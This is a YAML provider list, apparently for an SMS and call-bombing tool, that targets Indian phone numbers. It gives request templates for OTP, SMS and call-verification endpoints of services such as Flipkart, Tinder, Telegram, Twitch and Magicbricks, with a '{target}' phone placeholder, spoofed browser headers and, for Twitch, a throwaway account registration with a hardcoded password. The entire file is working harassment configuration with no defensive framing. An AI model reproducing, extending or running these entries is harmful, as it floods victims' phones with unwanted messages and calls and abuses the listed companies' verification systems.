# SPDX-License-Identifier: GPL-3.0-or-later

providers:
  '91':
    - name: "housing"
      method: "POST"
      url: "https://login.housing.com/api/v2/send-otp"
      data_type: "json"
      headers:
        "Origin": "https://housing.com"
      data:
        phone: "{target}"

    - name: "zee5"
      method: "POST"
      url: "https://api.zee5.com/customer/login/v2/otp/send"
      data_type: "json"
      data:
        phonenumber: "91{target}"

    - name: "apollo"
      method: "POST"
      url: "https://www.apollopharmacy.in/api/v1/auth/otp/send"
      data_type: "json"
      data:
        mobileNumber: "{target}"

    - name: "flipkart"
      method: "POST"
      url: "https://www.flipkart.com/api/5/user/otp/generate"
      data:
        loginId: "+91{target}"
      headers:
        "X-user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
        "Origin": "https://www.flipkart.com"

    - name: "tinder"
      method: "POST"
      url: "https://api.gotinder.com/v2/auth/sms/send"
      params:
        auth_type: "sms"
        locale: "en"
      data:
        phone_number: "91{target}"
      headers:
        "User-Agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X)"

    - name: "twitch"
      method: "POST"
      url: "https://passport.twitch.tv/register?trusted_request=true"
      data_type: "json"
      data:
        birthday: 
          day: 15
          month: 5
          year: 1995
        client_id: "qb1unb4b2q4t58fwldcbz2nnm46a8zp"
        include_verification_code: true
        password: "Password@123"
        phone_number: "91{target}"
        username: "user_{target}"
      headers:
        "Origin": "https://www.twitch.tv"

    - name: "telegram"
      method: "POST"
      url: "https://my.telegram.org/auth/send_password"
      data:
        phone: "+91{target}"

    - name: "ajio"
      method: "POST"
      url: "https://login.web.ajio.com/api/auth/signupSendOTP"
      data_type: "json"
      data:
        mobileNumber: "{target}"
        requestType: "SENDOTP"

    - name: "pharmeasy"
      method: "POST"
      url: "https://pharmeasy.in/api/auth/requestOTP"
      data_type: "json"
      data:
        contactNumber: "{target}"

    - name: "dream11"
      method: "POST"
      url: "https://api.dream11.com/sendsmslink"
      data:
        mobileNum: "{target}"
        siteId: "1"

    - name: "unacademy"
      method: "POST"
      url: "https://unacademy.com/api/v1/user/get_app_link/"
      data:
        phone: "{target}"

    - name: "redbus"
      method: "GET"
      url: "https://m.redbus.in/api/getOtp"
      params:
        number: "{target}"
        cc: "91"

    - name: "makaan_sms"
      method: "GET"
      url: "https://www.makaan.com/apis/nc/sendOtpOnCall/16257065/{target}"
      params:
        callType: "otpOnCall"

    - name: "magicbricks_sms"
      method: "GET"
      url: "https://api.magicbricks.com/bricks/verifyOnCall.html"
      params:
        mobile: "{target}"

    - name: "allensolly"
      method: "POST"
      url: "https://www.allensolly.com/capillarylogin/validateMobileOrEMail"
      data:
        mobileoremail: "{target}"
        name: "testuser"

    - name: "porter"
      method: "POST"
      url: "https://porter.in/restservice/send_app_link_sms"
      data:
        phone: "{target}"
        brand: "porter"